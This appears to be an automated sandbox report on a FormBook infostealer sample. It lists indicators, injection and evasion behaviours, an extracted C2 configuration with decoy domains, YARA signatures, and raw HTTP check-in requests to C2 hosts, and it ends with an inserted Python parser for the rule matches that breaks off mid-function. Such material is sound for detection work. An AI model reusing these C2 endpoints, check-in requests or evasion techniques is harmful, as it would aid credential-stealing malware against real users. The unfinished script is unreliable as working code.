Windows Analysis Report z7d1ehQQQW.exe

Overview

General Information

Sample Name: z7d1ehQQQW.exe
Analysis ID: 491384
MD5: 50568fb6133ee4ed721ee46a3c0a9e98
SHA1: 4897b6f2141395071652f72d34dc3d39eb014a56
SHA256: 2b1a98add215568bb5e1c333321cf0ffe98d9128fa149c4f5a07ce2922750b3e
Tags: exe

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • z7d1ehQQQW.exe (PID: 984 cmdline: 'C:\Users\user\Desktop\z7d1ehQQQW.exe' MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
    • z7d1ehQQQW.exe (PID: 5800 cmdline: C:\Users\user\Desktop\z7d1ehQQQW.exe MD5: 50568FB6133EE4ED721EE46A3C0A9E98)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.odysseysailingsantorini.com/cmsr/"], "decoy": ["dahlia-dolls.com", "iamawife.com", "gardunomx.com", "roweelitetrucking.com", "asapvk.com", "strategieslimited.com", "healthyweathorganics.com", "wedding-gallery.net", "fastoffer.online", "biolab33.cloud", "los40delocta.com", "charliepaton.com", "jenpaddock.com", "zzmweb.com", "poetarts.com", "techwork4u.com", "tracylynpropp.com", "rkbodyfit.site", "migaleriapanama.com", "cosmostco.com", "johnsoncamping.com", "flowfinancialplanning.com", "xn--caamosdemexico-rnb.com", "plusqueindia.com", "wwwhyprr.com", "benimofis.com", "tandteutopia.com", "spaintravelvacation.com", "dear.services", "zhiwugongfang.com", "blogdavnc.com", "justicefundingexchange.com", "alphasecreweb.info", "xitechgroup.com", "kendalmountain.digital", "nieght.com", "pieter-janenmaaike.online", "myexclusiveshop.com", "love-potato.online", "mondebestglobal.com", "ranchlandconcierge.com", "southerngraphx.com", "pray4usa.info", "vilchesfinancial.com", "zelvio.store", "zenibusiness.com", "kindredhue.com", "californiatacosdinuba.com", "uncommonsolutionsllc.com", "easy-lah.com", "disciplesevents.com", "856380127.xyz", "zapzapgone.com", "paradisgrp.com", "programmerworks.info", "purchasesuite.com", "dorotajedrusik.com", "555999dy.com", "uvoyus.com", "utang.net", "elizabethhelma.com", "noseainsight.com", "simpleterior.com", "casatensina.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x2675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x2161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x2777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x28ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x13dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x931a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x53f9:$sqlite3step: 68 34 1C 7B E1
  • 0x550c:$sqlite3step: 68 34 1C 7B E1
  • 0x5428:$sqlite3text: 68 38 2A 90 C5
  • 0x554d:$sqlite3text: 68 38 2A 90 C5
  • 0x543b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x5563:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further memory dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.z7d1ehQQQW.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.z7d1ehQQQW.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.z7d1ehQQQW.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0.2.z7d1ehQQQW.exe.2d13274.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
5.2.z7d1ehQQQW.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(2 further unpacked PE entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: z7d1ehQQQW.exe | Virustotal: Detection: 24%
Source: z7d1ehQQQW.exe | ReversingLabs: Detection: 13%
Yara detected FormBook
Source: Yara match | File source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 | Avira URL Cloud: Label: malware
Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: z7d1ehQQQW.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: z7d1ehQQQW.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdb | source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49822 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49852 -> 47.91.170.222:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.dorotajedrusik.com
Source: C:\Windows\explorer.exe | Domain query: www.noseainsight.com
Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.odysseysailingsantorini.com/cmsr/
Source: global traffic | HTTP traffic detected: GET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1 | Host: www.noseainsight.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1 | Host: www.dorotajedrusik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: cscript.exe, 00000009.00000002.918829235.00000000052AF000.00000004.00020000.sdmp | String found in binary or memory: https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd
Source: unknown | DNS traffic detected: queries for: www.noseainsight.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same unpacked PEs and memory dumps listed under "Yara detected FormBook" in the AV Detection section above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: z7d1ehQQQW.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
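The rule-match lines above are two rules (Felix Bilstein's yara-signator Formbook_1 and JPCERT/CC's Formbook) firing on the same handful of memory regions, listed once per rule and once per dump type. The Python below is an added triage example, not tooling from this report: it collapses the lines into one record per (process index, base address) and picks out the regions that two independent rule authors both flag, which is the strongest evidence in the list. It relies only on the dump naming the report itself makes visible: the first dotted field is the process index (5 is the second z7d1ehQQQW.exe instance and 9 is cscript.exe, matching the 5_2_ and 9_2_ code-function prefixes further down), and the fourth field is the region base address (the 0000000000400000 dump and the 5.2.z7d1ehQQQW.exe.400000.0.unpack file are the same region). Treating the fifth field as the Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE) is an assumption inferred from the values seen. The sample lines are copied from this report; the parser accepts both the fused "MEMORYMatched rule" form that HTML extraction produces and a cleaned form with a " | " separator.

```python
"""Collapse sandbox 'Matched rule' lines into one record per memory region.

Added example for reading a Joe Sandbox style report; not tooling from the report.
"""
import re
from collections import defaultdict

# Win32 page-protection constants (certain). That the fifth dump-name field is
# the protection value is an ASSUMPTION inferred from the values in the report.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# "Source: <src>, type: <TYPE>Matched rule: <rule text>"; the TYPE and
# "Matched rule" may be fused by extraction or separated by " | ".
LINE_RE = re.compile(
    r"^\s*Source:\s+(?P<src>.+?),\s+type:\s+(?P<type>[A-Z]+)\s*\|?\s*Matched rule:\s+(?P<rule>.+)$"
)
# <procidx>.<phase>.<seq>.<base>.<prot>.<memtype>.sdmp  (all hex except seq)
DUMP_RE = re.compile(
    r"^(?P<pidx>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<mtype>[0-9A-F]{8})\.sdmp$",
    re.I,
)
# <procidx>.<phase>.<image>.<base>.<n>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<pidx>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-F]+)\.\d+(?:\.raw)?\.unpack$",
    re.I,
)
AUTHOR_RE = re.compile(r"(?:Author:|author =)\s*(?P<author>[^,]+)")
RULE_SPLIT_RE = re.compile(r"\s+(?:Author:|author =|date =|description =)")

# Constructed sample: lines copied from the report above (one in the cleaned form).
SAMPLE_LINES = [
    "Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607",
    "Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: z7d1ehQQQW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE",
]


def parse_line(line):
    """Return (process_index, base, protection_or_None, dump_type, rule_label, author)
    for one 'Matched rule' line, or None when the line is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, kind, rule = m["src"], m["type"], m["rule"]
    d = DUMP_RE.match(src)
    if d:
        pidx, base, prot = int(d["pidx"], 16), int(d["base"], 16), int(d["prot"], 16)
    else:
        u = UNPACK_RE.match(src)
        if not u:
            return None
        pidx, base, prot = int(u["pidx"]), int(u["base"], 16), None
    label = RULE_SPLIT_RE.split(rule, maxsplit=1)[0].strip()
    a = AUTHOR_RE.search(rule)
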